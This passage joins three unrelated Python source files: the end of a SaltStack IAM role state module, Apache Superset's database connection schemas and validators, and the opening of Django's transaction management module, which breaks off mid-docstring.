associated = __salt__["boto_iam.associate_profile_to_role"](
name, name, region, key, keyid, profile
)
if associated:
ret["changes"]["old"] = {"profile_associated": None}
ret["changes"]["new"] = {"profile_associated": True}
ret["comment"] = "Instance profile {} associated.".format(name)
else:
ret["result"] = False
ret[
"comment"
] = "Failed to associate {0} instance profile with {0} role.".format(name)
return ret
def _sort_policy(doc):
"""
List-type sub-items in policies don't happen to be order-sensitive, but
compare operations will render them unequal, leading to non-idempotent
state runs. We'll sort any list-type subitems before comparison to reduce
the likelihood of false negatives.
"""
if isinstance(doc, list):
return sorted(_sort_policy(i) for i in doc)
elif isinstance(doc, (dict, OrderedDict)):
return {k: _sort_policy(v) for k, v in doc.items()}
return doc
def _policies_present(
name,
policies=None,
region=None,
key=None,
keyid=None,
profile=None,
delete_policies=True,
):
ret = {"result": True, "comment": "", "changes": {}}
policies_to_create = {}
policies_to_delete = []
for policy_name, policy in policies.items():
_policy = __salt__["boto_iam.get_role_policy"](
name, policy_name, region, key, keyid, profile
)
if _policy != policy:
policies_to_create[policy_name] = policy
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
for policy_name in _list:
if delete_policies and policy_name not in policies:
policies_to_delete.append(policy_name)
if policies_to_create or policies_to_delete:
_to_modify = list(policies_to_delete)
_to_modify.extend(policies_to_create)
if __opts__["test"]:
ret["comment"] = "{} policies to be modified on role {}.".format(
", ".join(_to_modify), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"policies": _list}
for policy_name, policy in policies_to_create.items():
policy_set = __salt__["boto_iam.create_role_policy"](
name, policy_name, policy, region, key, keyid, profile
)
if not policy_set:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
for policy_name in policies_to_delete:
policy_unset = __salt__["boto_iam.delete_role_policy"](
name, policy_name, region, key, keyid, profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to remove policy {} from role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["comment"] = "{} policies modified on role {}.".format(
", ".join(_list), name
)
return ret
def _policies_attached(
name, managed_policies=None, region=None, key=None, keyid=None, profile=None
):
ret = {"result": True, "comment": "", "changes": {}}
policies_to_attach = []
policies_to_detach = []
for policy in managed_policies or []:
entities = __salt__["boto_iam.list_entities_for_policy"](
policy,
entity_filter="Role",
region=region,
key=key,
keyid=keyid,
profile=profile,
)
found = False
for roledict in entities.get("policy_roles", []):
if name == roledict.get("role_name"):
found = True
break
if not found:
policies_to_attach.append(policy)
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
oldpolicies = [x.get("policy_arn") for x in _list]
for policy_data in _list:
if (
policy_data.get("policy_name") not in managed_policies
and policy_data.get("policy_arn") not in managed_policies
):
policies_to_detach.append(policy_data.get("policy_arn"))
if policies_to_attach or policies_to_detach:
_to_modify = list(policies_to_detach)
_to_modify.extend(policies_to_attach)
if __opts__["test"]:
ret["comment"] = "{} policies to be modified on role {}.".format(
", ".join(_to_modify), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"managed_policies": oldpolicies}
for policy_name in policies_to_attach:
policy_set = __salt__["boto_iam.attach_role_policy"](
policy_name,
role_name=name,
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not policy_set:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
for policy_name in policies_to_detach:
policy_unset = __salt__["boto_iam.detach_role_policy"](
policy_name,
role_name=name,
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not policy_unset:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to remove policy {} from role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
log.debug(newpolicies)
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["comment"] = "{} policies modified on role {}.".format(
", ".join(newpolicies), name
)
return ret
def absent(name, region=None, key=None, keyid=None, profile=None):
"""
Ensure the IAM role is deleted.
name
Name of the IAM role.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
_ret = _policies_absent(name, region, key, keyid, profile)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _policies_detached(name, region, key, keyid, profile)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_disassociated(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_absent(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _role_absent(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
return ret
def _role_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.role_exists"](name, region, key, keyid, profile)
if exists:
if __opts__["test"]:
ret["comment"] = "IAM role {} is set to be removed.".format(name)
ret["result"] = None
return ret
deleted = __salt__["boto_iam.delete_role"](name, region, key, keyid, profile)
if deleted:
ret["changes"]["old"] = {"role": name}
ret["changes"]["new"] = {"role": None}
ret["comment"] = "IAM role {} removed.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to delete {} iam role.".format(name)
else:
ret["comment"] = "{} role does not exist.".format(name)
return ret
def _instance_profile_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.instance_profile_exists"](
name, region, key, keyid, profile
)
if exists:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be removed.".format(name)
ret["result"] = None
return ret
deleted = __salt__["boto_iam.delete_instance_profile"](
name, region, key, keyid, profile
)
if deleted:
ret["changes"]["old"] = {"instance_profile": name}
ret["changes"]["new"] = {"instance_profile": None}
ret["comment"] = "Instance profile {} removed.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to delete {} instance profile.".format(name)
else:
ret["comment"] = "{} instance profile does not exist.".format(name)
return ret
def _policies_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
if not _list:
ret["comment"] = "No policies in role {}.".format(name)
return ret
if __opts__["test"]:
ret["comment"] = "{} policies to be removed from role {}.".format(
", ".join(_list), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"policies": _list}
for policy_name in _list:
policy_unset = __salt__["boto_iam.delete_role_policy"](
name, policy_name, region, key, keyid, profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
ret["changes"]["new"] = {"policies": _list}
ret["comment"] = "{} policies removed from role {}.".format(", ".join(_list), name)
return ret
def _policies_detached(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
_list = __salt__["boto_iam.list_attached_role_policies"](
role_name=name, region=region, key=key, keyid=keyid, profile=profile
)
oldpolicies = [x.get("policy_arn") for x in _list]
if not _list:
ret["comment"] = "No attached policies in role {}.".format(name)
return ret
if __opts__["test"]:
ret["comment"] = "{} policies to be detached from role {}.".format(
", ".join(oldpolicies), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"managed_policies": oldpolicies}
for policy_arn in oldpolicies:
policy_unset = __salt__["boto_iam.detach_role_policy"](
policy_arn, name, region=region, key=key, keyid=keyid, profile=profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to detach {} from role {}".format(policy_arn, name)
return ret
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["comment"] = "{} policies detached from role {}.".format(
", ".join(newpolicies), name
)
return ret
def _instance_profile_disassociated(
name, region=None, key=None, keyid=None, profile=None
):
ret = {"result": True, "comment": "", "changes": {}}
is_associated = __salt__["boto_iam.profile_associated"](
name, name, region, key, keyid, profile
)
if is_associated:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be disassociated.".format(
name
)
ret["result"] = None
return ret
associated = __salt__["boto_iam.disassociate_profile_from_role"](
name, name, region, key, keyid, profile
)
if associated:
ret["changes"]["old"] = {"profile_associated": True}
ret["changes"]["new"] = {"profile_associated": False}
ret["comment"] = "Instance profile {} disassociated.".format(name)
else:
ret["result"] = False
ret[
"comment"
] = "Failed to disassociate {0} instance profile from {0} role.".format(
name
)
return ret
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import json
from typing import Any, Dict, Optional, Type
from flask import current_app
from flask_babel import lazy_gettext as _
from marshmallow import EXCLUDE, fields, pre_load, Schema, validates_schema
from marshmallow.validate import Length, ValidationError
from marshmallow_enum import EnumField
from sqlalchemy import MetaData
from sqlalchemy.engine.url import make_url
from sqlalchemy.exc import ArgumentError
from superset import db
from superset.db_engine_specs import BaseEngineSpec, get_engine_specs
from superset.exceptions import CertificateException, SupersetSecurityException
from superset.models.core import ConfigurationMethod, Database, PASSWORD_MASK
from superset.security.analytics_db_safety import check_sqlalchemy_uri
from superset.utils.core import markdown, parse_ssl_cert
database_schemas_query_schema = {
"type": "object",
"properties": {"force": {"type": "boolean"}},
}
database_name_description = "A database name to identify this connection."
port_description = "Port number for the database connection."
cache_timeout_description = (
"Duration (in seconds) of the caching timeout for charts of this database. "
"A timeout of 0 indicates that the cache never expires. "
"Note this defaults to the global timeout if undefined."
)
expose_in_sqllab_description = "Expose this database to SQLLab"
allow_run_async_description = (
"Operate the database in asynchronous mode, meaning "
"that the queries are executed on remote workers as opposed "
"to on the web server itself. "
"This assumes that you have a Celery worker setup as well "
"as a results backend. Refer to the installation docs "
"for more information."
)
allow_file_upload_description = (
"Allow to upload CSV file data into this database"
"If selected, please set the schemas allowed for csv upload in Extra."
)
allow_ctas_description = "Allow CREATE TABLE AS option in SQL Lab"
allow_cvas_description = "Allow CREATE VIEW AS option in SQL Lab"
allow_dml_description = (
"Allow users to run non-SELECT statements "
"(UPDATE, DELETE, CREATE, ...) "
"in SQL Lab"
)
allow_multi_schema_metadata_fetch_description = (
"Allow SQL Lab to fetch a list of all tables and all views across "
"all database schemas. For large data warehouse with thousands of "
"tables, this can be expensive and put strain on the system."
) # pylint: disable=invalid-name
configuration_method_description = (
"Configuration_method is used on the frontend to "
"inform the backend whether to explode parameters "
"or to provide only a sqlalchemy_uri."
)
impersonate_user_description = (
"If Presto, all the queries in SQL Lab are going to be executed as the "
"currently logged on user who must have permission to run them.<br/>"
"If Hive and hive.server2.enable.doAs is enabled, will run the queries as "
"service account, but impersonate the currently logged on user "
"via hive.server2.proxy.user property."
)
force_ctas_schema_description = (
"When allowing CREATE TABLE AS option in SQL Lab, "
"this option forces the table to be created in this schema"
)
encrypted_extra_description = markdown(
"JSON string containing additional connection configuration.<br/>"
"This is used to provide connection information for systems like "
"Hive, Presto, and BigQuery, which do not conform to the username:password "
"syntax normally used by SQLAlchemy.",
True,
)
extra_description = markdown(
"JSON string containing extra configuration elements.<br/>"
"1. The ``engine_params`` object gets unpacked into the "
"[sqlalchemy.create_engine]"
"(https://docs.sqlalchemy.org/en/latest/core/engines.html#"
"sqlalchemy.create_engine) call, while the ``metadata_params`` "
"gets unpacked into the [sqlalchemy.MetaData]"
"(https://docs.sqlalchemy.org/en/rel_1_0/core/metadata.html"
"#sqlalchemy.schema.MetaData) call.<br/>"
"2. The ``metadata_cache_timeout`` is a cache timeout setting "
"in seconds for metadata fetch of this database. Specify it as "
'**"metadata_cache_timeout": {"schema_cache_timeout": 600, '
'"table_cache_timeout": 600}**. '
"If unset, cache will not be enabled for the functionality. "
"A timeout of 0 indicates that the cache never expires.<br/>"
"3. The ``schemas_allowed_for_file_upload`` is a comma separated list "
"of schemas that CSVs are allowed to upload to. "
'Specify it as **"schemas_allowed_for_file_upload": '
'["public", "csv_upload"]**. '
"If database flavor does not support schema or any schema is allowed "
"to be accessed, just leave the list empty<br/>"
"4. the ``version`` field is a string specifying the this db's version. "
"This should be used with Presto DBs so that the syntax is correct<br/>"
"5. The ``allows_virtual_table_explore`` field is a boolean specifying "
"whether or not the Explore button in SQL Lab results is shown.",
True,
)
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
sqlalchemy_uri_description = markdown(
"Refer to the "
"[SqlAlchemy docs]"
"(https://docs.sqlalchemy.org/en/rel_1_2/core/engines.html#"
"database-urls) "
"for more information on how to structure your URI.",
True,
)
server_cert_description = markdown(
"Optional CA_BUNDLE contents to validate HTTPS requests. Only available "
"on certain database engines.",
True,
)
def sqlalchemy_uri_validator(value: str) -> str:
"""
Validate if it's a valid SQLAlchemy URI and refuse SQLLite by default
"""
try:
uri = make_url(value.strip())
except (ArgumentError, AttributeError, ValueError) as ex:
raise ValidationError(
[
_(
"Invalid connection string, a valid string usually follows: "
"driver://user:password@database-host/database-name"
)
]
) from ex
if current_app.config.get("PREVENT_UNSAFE_DB_CONNECTIONS", True):
try:
check_sqlalchemy_uri(uri)
except SupersetSecurityException as ex:
raise ValidationError([str(ex)]) from ex
return value
def server_cert_validator(value: str) -> str:
"""
Validate the server certificate
"""
if value:
try:
parse_ssl_cert(value)
except CertificateException as ex:
raise ValidationError([_("Invalid certificate")]) from ex
return value
def encrypted_extra_validator(value: str) -> str:
"""
Validate that encrypted extra is a valid JSON string
"""
if value:
try:
json.loads(value)
except json.JSONDecodeError as ex:
raise ValidationError(
[_("Field cannot be decoded by JSON. %(msg)s", msg=str(ex))]
) from ex
return value
def extra_validator(value: str) -> str:
"""
Validate that extra is a valid JSON string, and that metadata_params
keys are on the call signature for SQLAlchemy Metadata
"""
if value:
try:
extra_ = json.loads(value)
except json.JSONDecodeError as ex:
raise ValidationError(
[_("Field cannot be decoded by JSON. %(msg)s", msg=str(ex))]
) from ex
else:
metadata_signature = inspect.signature(MetaData)
for key in extra_.get("metadata_params", {}):
if key not in metadata_signature.parameters:
raise ValidationError(
[
_(
"The metadata_params in Extra field "
"is not configured correctly. The key "
"%(key)s is invalid.",
key=key,
)
]
)
return value
class DatabaseParametersSchemaMixin: # pylint: disable=too-few-public-methods
"""
Allow SQLAlchemy URI to be passed as separate parameters.
This mixin is a first step in allowing the users to test, create and
edit databases without having to know how to write a SQLAlchemy URI.
Instead, each database defines the parameters that it takes (eg,
username, password, host, etc.) and the SQLAlchemy URI is built from
these parameters.
When using this mixin make sure that `sqlalchemy_uri` is not required.
"""
engine = fields.String(allow_none=True, description="SQLAlchemy engine to use")
parameters = fields.Dict(
keys=fields.String(),
values=fields.Raw(),
description="DB-specific parameters for configuration",
)
configuration_method = EnumField(
ConfigurationMethod,
by_value=True,
description=configuration_method_description,
missing=ConfigurationMethod.SQLALCHEMY_FORM,
)
# pylint: disable=no-self-use, unused-argument
@pre_load
def build_sqlalchemy_uri(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
"""
Build SQLAlchemy URI from separate parameters.
This is used for databases that support being configured by individual
parameters (eg, username, password, host, etc.), instead of requiring
the constructed SQLAlchemy URI to be passed.
"""
parameters = data.pop("parameters", {})
# TODO(AAfghahi) standardize engine.
engine = (
data.pop("engine", None)
or parameters.pop("engine", None)
or data.pop("backend", None)
)
configuration_method = data.get("configuration_method")
if configuration_method == ConfigurationMethod.DYNAMIC_FORM:
engine_spec = get_engine_spec(engine)
if not hasattr(engine_spec, "build_sqlalchemy_uri") or not hasattr(
engine_spec, "parameters_schema"
):
raise ValidationError(
[
_(
'Engine spec "InvalidEngine" does not support '
"being configured via individual parameters."
)
]
)
# validate parameters
parameters = engine_spec.parameters_schema.load(parameters) # type: ignore
serialized_encrypted_extra = data.get("encrypted_extra") or "{}"
try:
encrypted_extra = json.loads(serialized_encrypted_extra)
except json.decoder.JSONDecodeError:
encrypted_extra = {}
data["sqlalchemy_uri"] = engine_spec.build_sqlalchemy_uri( # type: ignore
parameters, encrypted_extra
)
return data
def get_engine_spec(engine: Optional[str]) -> Type[BaseEngineSpec]:
if not engine:
raise ValidationError(
[
_(
"An engine must be specified when passing "
"individual parameters to a database."
)
]
)
engine_specs = get_engine_specs()
if engine not in engine_specs:
raise ValidationError(
[_('Engine "%(engine)s" is not a valid engine.', engine=engine,)]
)
return engine_specs[engine]
class DatabaseValidateParametersSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
engine = fields.String(required=True, description="SQLAlchemy engine to use")
parameters = fields.Dict(
keys=fields.String(),
values=fields.Raw(allow_none=True),
description="DB-specific parameters for configuration",
)
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
extra = fields.String(description=extra_description, validate=extra_validator)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
configuration_method = EnumField(
ConfigurationMethod,
by_value=True,
required=True,
description=configuration_method_description,
)
class DatabasePostSchema(Schema, DatabaseParametersSchemaMixin):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
database_name = fields.String(
description=database_name_description, required=True, validate=Length(1, 250),
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
expose_in_sqllab = fields.Boolean(description=expose_in_sqllab_description)
allow_run_async = fields.Boolean(description=allow_run_async_description)
allow_file_upload = fields.Boolean(description=allow_file_upload_description)
allow_ctas = fields.Boolean(description=allow_ctas_description)
allow_cvas = fields.Boolean(description=allow_cvas_description)
allow_dml = fields.Boolean(description=allow_dml_description)
force_ctas_schema = fields.String(
description=force_ctas_schema_description,
allow_none=True,
validate=Length(0, 250),
)
allow_multi_schema_metadata_fetch = fields.Boolean(
description=allow_multi_schema_metadata_fetch_description,
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
extra = fields.String(description=extra_description, validate=extra_validator)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(1, 1024), sqlalchemy_uri_validator],
)
class DatabasePutSchema(Schema, DatabaseParametersSchemaMixin):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
expose_in_sqllab = fields.Boolean(description=expose_in_sqllab_description)
allow_run_async = fields.Boolean(description=allow_run_async_description)
allow_file_upload = fields.Boolean(description=allow_file_upload_description)
allow_ctas = fields.Boolean(description=allow_ctas_description)
allow_cvas = fields.Boolean(description=allow_cvas_description)
allow_dml = fields.Boolean(description=allow_dml_description)
force_ctas_schema = fields.String(
description=force_ctas_schema_description,
allow_none=True,
validate=Length(0, 250),
)
allow_multi_schema_metadata_fetch = fields.Boolean(
description=allow_multi_schema_metadata_fetch_description
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
encrypted_extra = fields.String(
description=encrypted_extra_description,
allow_none=True,
validate=encrypted_extra_validator,
)
extra = fields.String(description=extra_description, validate=extra_validator)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(0, 1024), sqlalchemy_uri_validator],
)
class DatabaseTestConnectionSchema(Schema, DatabaseParametersSchemaMixin):
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
extra = fields.String(description=extra_description, validate=extra_validator)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(1, 1024), sqlalchemy_uri_validator],
)
class TableMetadataOptionsResponseSchema(Schema):
deferrable = fields.Bool()
initially = fields.Bool()
match = fields.Bool()
ondelete = fields.Bool()
onupdate = fields.Bool()
class TableMetadataColumnsResponseSchema(Schema):
keys = fields.List(fields.String(), description="")
longType = fields.String(description="The actual backend long type for the column")
name = fields.String(description="The column name")
type = fields.String(description="The column type")
duplicates_constraint = fields.String(required=False)
class TableMetadataForeignKeysIndexesResponseSchema(Schema):
column_names = fields.List(
fields.String(
description="A list of column names that compose the foreign key or index"
)
)
name = fields.String(description="The name of the foreign key or index")
options = fields.Nested(TableMetadataOptionsResponseSchema)
referred_columns = fields.List(fields.String())
referred_schema = fields.String()
referred_table = fields.String()
type = fields.String()
class TableMetadataPrimaryKeyResponseSchema(Schema):
column_names = fields.List(
fields.String(description="A list of column names that compose the primary key")
)
name = fields.String(description="The primary key index name")
type = fields.String()
class TableMetadataResponseSchema(Schema):
name = fields.String(description="The name of the table")
columns = fields.List(
fields.Nested(TableMetadataColumnsResponseSchema),
description="A list of columns and their metadata",
)
foreignKeys = fields.List(
fields.Nested(TableMetadataForeignKeysIndexesResponseSchema),
description="A list of foreign keys and their metadata",
)
indexes = fields.List(
fields.Nested(TableMetadataForeignKeysIndexesResponseSchema),
description="A list of indexes and their metadata",
)
primaryKey = fields.Nested(
TableMetadataPrimaryKeyResponseSchema, description="Primary keys metadata"
)
selectStar = fields.String(description="SQL select star")
class SelectStarResponseSchema(Schema):
result = fields.String(description="SQL select star")
class SchemasResponseSchema(Schema):
result = fields.List(fields.String(description="A database schema name"))
class DatabaseRelatedChart(Schema):
id = fields.Integer()
slice_name = fields.String()
viz_type = fields.String()
class DatabaseRelatedDashboard(Schema):
id = fields.Integer()
json_metadata = fields.Dict()
slug = fields.String()
title = fields.String()
class DatabaseRelatedCharts(Schema):
count = fields.Integer(description="Chart count")
result = fields.List(
fields.Nested(DatabaseRelatedChart), description="A list of dashboards"
)
class DatabaseRelatedDashboards(Schema):
count = fields.Integer(description="Dashboard count")
result = fields.List(
fields.Nested(DatabaseRelatedDashboard), description="A list of dashboards"
)
class DatabaseRelatedObjectsResponse(Schema):
charts = fields.Nested(DatabaseRelatedCharts)
dashboards = fields.Nested(DatabaseRelatedDashboards)
class DatabaseFunctionNamesResponse(Schema):
function_names = fields.List(fields.String())
class ImportV1DatabaseExtraSchema(Schema):
# pylint: disable=no-self-use, unused-argument
@pre_load
def fix_schemas_allowed_for_csv_upload(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
"""
Fixes for ``schemas_allowed_for_csv_upload``.
"""
# Fix for https://github.com/apache/superset/pull/16756, which temporarily
# changed the V1 schema. We need to support exports made after that PR and
# before this PR.
if "schemas_allowed_for_file_upload" in data:
data["schemas_allowed_for_csv_upload"] = data.pop(
"schemas_allowed_for_file_upload"
)
# Fix ``schemas_allowed_for_csv_upload`` being a string.
# Due to a bug in the database modal, some databases might have been
# saved and exported with a string for ``schemas_allowed_for_csv_upload``.
schemas_allowed_for_csv_upload = data.get("schemas_allowed_for_csv_upload")
if isinstance(schemas_allowed_for_csv_upload, str):
data["schemas_allowed_for_csv_upload"] = json.loads(
schemas_allowed_for_csv_upload
)
return data
metadata_params = fields.Dict(keys=fields.Str(), values=fields.Raw())
engine_params = fields.Dict(keys=fields.Str(), values=fields.Raw())
metadata_cache_timeout = fields.Dict(keys=fields.Str(), values=fields.Integer())
schemas_allowed_for_csv_upload = fields.List(fields.String())
cost_estimate_enabled = fields.Boolean()
class ImportV1DatabaseSchema(Schema):
# pylint: disable=no-self-use, unused-argument
@pre_load
def fix_allow_csv_upload(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
"""
Fix for ``allow_csv_upload`` .
"""
# Fix for https://github.com/apache/superset/pull/16756, which temporarily
# changed the V1 schema. We need to support exports made after that PR and
# before this PR.
if "allow_file_upload" in data:
data["allow_csv_upload"] = data.pop("allow_file_upload")
return data
database_name = fields.String(required=True)
sqlalchemy_uri = fields.String(required=True)
password = fields.String(allow_none=True)
cache_timeout = fields.Integer(allow_none=True)
expose_in_sqllab = fields.Boolean()
allow_run_async = fields.Boolean()
allow_ctas = fields.Boolean()
allow_cvas = fields.Boolean()
allow_csv_upload = fields.Boolean()
extra = fields.Nested(ImportV1DatabaseExtraSchema)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
# pylint: disable=no-self-use, unused-argument
@validates_schema
def validate_password(self, data: Dict[str, Any], **kwargs: Any) -> None:
"""If sqlalchemy_uri has a masked password, password is required"""
uuid = data["uuid"]
existing = db.session.query(Database).filter_by(uuid=uuid).first()
if existing:
return
uri = data["sqlalchemy_uri"]
password = make_url(uri).password
if password == PASSWORD_MASK and data.get("password") is None:
raise ValidationError("Must provide a password for the database")
class EncryptedField: # pylint: disable=too-few-public-methods
"""
A database field that should be stored in encrypted_extra.
"""
class EncryptedString(EncryptedField, fields.String):
pass
class EncryptedDict(EncryptedField, fields.Dict):
pass
def encrypted_field_properties(self, field: Any, **_) -> Dict[str, Any]: # type: ignore
ret = {}
if isinstance(field, EncryptedField):
if self.openapi_version.major > 2:
ret["x-encrypted-extra"] = True
return ret
|
|
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, Error, ProgrammingError, connections,
)
from django.utils.decorators import ContextDecorator
class TransactionManagementError(ProgrammingError):
"""
This exception is thrown when transaction management is used improperly.
"""
pass
def get_connection(using=None):
"""
Get a database connection by name, or the default database connection
if no name is provided. This is a private API.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return connections[using]
def get_autocommit(using=None):
"""
Get the autocommit status of the connection.
"""
return get_connection(using).get_autocommit()
def set_autocommit(autocommit, using=None):
"""
Set the autocommit status of the connection.
"""
return get_connection(using).set_autocommit(autocommit)
def commit(using=None):
"""
Commits a transaction.
"""
get_connection(using).commit()
def rollback(using=None):
"""
Rolls back a transaction.
"""
get_connection(using).rollback()
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
return get_connection(using).savepoint()
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
get_connection(using).savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
get_connection(using).savepoint_commit(sid)
def clean_savepoints(using=None):
"""
Resets the counter used to generate unique savepoint ids in this thread.
"""
get_connection(using).clean_savepoints()
def get_rollback(using=None):
"""
Gets the "needs rollback" flag -- for *advanced use* only.
"""
return get_connection(using).get_rollback()
def set_rollback(rollback, using=None):
"""
Sets or unsets the "needs rollback" flag -- for *advanced use* only.
When `rollback` is `True`, it triggers a rollback when exiting the
innermost enclosing atomic block that has `savepoint=True` (that's the
default). Use this to force a rollback without raising an exception.
When `rollback` is `False`, it prevents such a rollback. Use this only
after rolling back to a known-good state! Otherwise, you break the atomic
block and data corruption may occur.
"""
return get_connection(using).set_rollback(rollback)
#################################
# Decorators / context managers #
#################################
class Atomic(ContextDecorator):
"""
This class guarantees the atomic execution of a given block.
An instance can be used either as a decorator or as a context manager.
When it's used as a decorator, __call__ wraps the execution of the
